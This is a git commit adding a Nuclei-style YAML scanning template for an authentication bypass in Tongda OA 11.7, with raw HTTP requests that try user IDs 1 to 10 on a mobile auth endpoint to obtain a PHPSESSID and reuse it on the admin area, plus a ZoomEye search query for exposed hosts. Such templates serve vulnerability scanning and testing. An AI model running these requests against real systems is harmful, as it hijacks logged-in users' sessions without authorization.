create: tongda-online-user-login

patch-1
TFDDZ 2023-07-18 14:09:44 +08:00
parent 9ca1706cf2
commit b088d3cc67
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: tongda-online-user-login
info:
name: Tongda OA 11.7 Online User Login
author: HuTa0
severity: high
description: |
Tongda OA is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., LTD v11.7 has the interface query online user function, when the user is online, it will return PHPSESSION so that it can log in to the background system.
reference:
- https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/
metadata:
zoomeye-query: app:"通达OA"
tags: tongda,bypass
http:
- raw:
- |
GET /mobile/auth_mobi.php?isAvatar=1&uid={{uid}}&P_VER=0 HTTP/1.1
Host: {{Hostname}}
- |-
GET /general/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200"
- "len(body_1) == 0"
- "contains(header_1,'PHPSESSID=')"
- "contains(body_2,'uid:')"
- "contains(body_2,'loginUser')"
condition: and
payloads:
product:
uid: [1,2,3,4,5,6,7,8,9,10]